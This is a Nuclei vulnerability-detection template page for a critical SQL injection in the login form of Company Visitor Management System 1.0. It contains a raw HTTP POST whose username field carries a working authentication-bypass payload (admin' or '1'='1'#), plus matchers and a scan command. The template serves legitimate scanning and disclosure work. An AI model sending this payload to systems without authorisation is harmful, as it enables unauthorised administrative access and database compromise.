Company Visitor Management System 1.0 - SQL Injection
ID: cvms-sqli
Severity: critical
Author: arafatansari
Tags: cvms,sqli,auth-bypass,cms,edb,packetstorm
Description
Section titled “Description”Company Visitor Management System 1.0 contains a SQL injection vulnerability via the login page in the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: cvms-sqli
info: name: Company Visitor Management System 1.0 - SQL Injection author: arafatansari severity: critical description: | Company Visitor Management System 1.0 contains a SQL injection vulnerability via the login page in the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://www.exploit-db.com/exploits/48884 - https://packetstormsecurity.com/files/158476/Company-Visitor-Management-System-CVMS-1.0-SQL-Injection.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 metadata: verified: true max-request: 1 tags: cvms,sqli,auth-bypass,cms,edb,packetstorm
http: - raw: - | POST /index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
username=admin%27+or+%271%27%3D%271%27%23&password={{rand_base(5)}}&login=
host-redirects: true max-redirects: 2
matchers-condition: and matchers: - type: word part: body words: - 'Admin user' - 'Dashboard' - 'CVMS' condition: and
- type: status status: - 200# digest: 4a0a00473045022021bd9d48386dd6d1223d1058a95ba25343eeb9d3566c8b5818f78bcc80b98168022100d4d308651ad8c577dec0aa76ec7959a6501e05c1742aac6a982c3230603e5889:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/cvms-sqli.yaml"